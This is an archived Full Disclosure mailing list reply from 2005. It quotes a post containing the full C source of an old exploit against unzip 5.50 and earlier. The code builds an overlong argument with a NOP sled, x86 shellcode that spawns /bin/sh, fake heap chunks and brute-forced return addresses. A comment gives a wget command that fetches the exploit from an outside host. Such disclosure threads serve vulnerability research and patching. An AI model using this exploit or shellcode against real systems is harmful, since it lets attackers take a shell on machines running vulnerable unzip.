Full Disclosure mailing list archives
Re: Unzip *ALL* verisons ;))
From: "GroundZero Security" <fd () g-0 org>
Date: Tue, 20 Dec 2005 00:19:46 +0100
LOL! ----- Original Message ----- From: "KF (lists)" <kf_lists () digitalmunition com> To: <full-disclosure () lists grok org uk> Sent: Monday, December 19, 2005 10:42 PM Subject: Re: [Full-disclosure] Unzip *ALL* verisons ;))
Im thinking this is a pretty old school bug... this is damn old code I believe. I know its something I found while working at Snosoft but I have no clue when. /* By DVDMAN (DVDMAN () L33TSECURITY COM)dvdman () snosoft com http://www.snosoft.com http://WWW.L33TSECURITY.COM L33T SECURITY Keep It Private based on code by hackbox.ath.cx > wget http://hackbox.ath.cx/mizc/unzip-expl.c lame unzip <= 5.50 tested on redhat 7.2 By DVDMAN L33TSECURITY.COM */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #define MAX "\x39\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" #define BUF 3264+1900+20000 #define LOC 3262 #define OFFSET 700 // brute force it char fakechunk[] = "\xf0\xff\xff\xff" "\xfc\xff\xff\xff" "\xde\x16\xe8\x77" "\x42\x6c\xe8\x77"; char execshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89" "\xc2\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\x40" "\xcd\x80"; /* newroot's shellcode */ int main (int argc, char *argv[]) { char buf[BUF + 1]; int x; char *ptr; int i=0,offset=OFFSET; unsigned long addy = 0xbffffab0; if (argc < 2) { printf("[L33TSECURITY]"); printf("UNZIP EXPLOIT BY DVDMAN "); printf("[L33TSECURITY]\n"); printf("[Usage] %s Offset\n",argv[0]); return; } if (argc > 1) offset = atoi(argv[1]); memset(buf,0x90,BUF); ptr = buf + ((BUF) - strlen(execshell)); for (i=0;i<strlen(execshell);i++) *(ptr++) = execshell[i]; *(long*)&buf[LOC] = addy + offset; *(long*)&buf[LOC+4] = addy + offset; buf[BUF] = 0; if (buf < MAX) { x = atoi(fakechunk + 2); memset(buf,x,BUF); execl("/usr/bin/unzip","unzip",buf,NULL); } execl("/usr/bin/unzip","unzip",buf,fakechunk,NULL); return; } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) Joachim Schipper (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) Joachim Schipper (Dec 19)
- Re: Unzip *ALL* verisons ;)) deepquest (Dec 19)
- Re: Unzip *ALL* verisons ;)) KF (lists) (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) KF (lists) (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- Re: Unzip *ALL* verisons ;)) GroundZero Security (Dec 19)
- Re: Unzip *ALL* verisons ;)) Joachim Schipper (Dec 19)
- <Possible follow-ups>
- Re: Unzip *ALL* verisons ;)) c0ntex (Dec 19)
- RE: Unzip *ALL* verisons ;)) Bob Dehnhardt (Dec 19)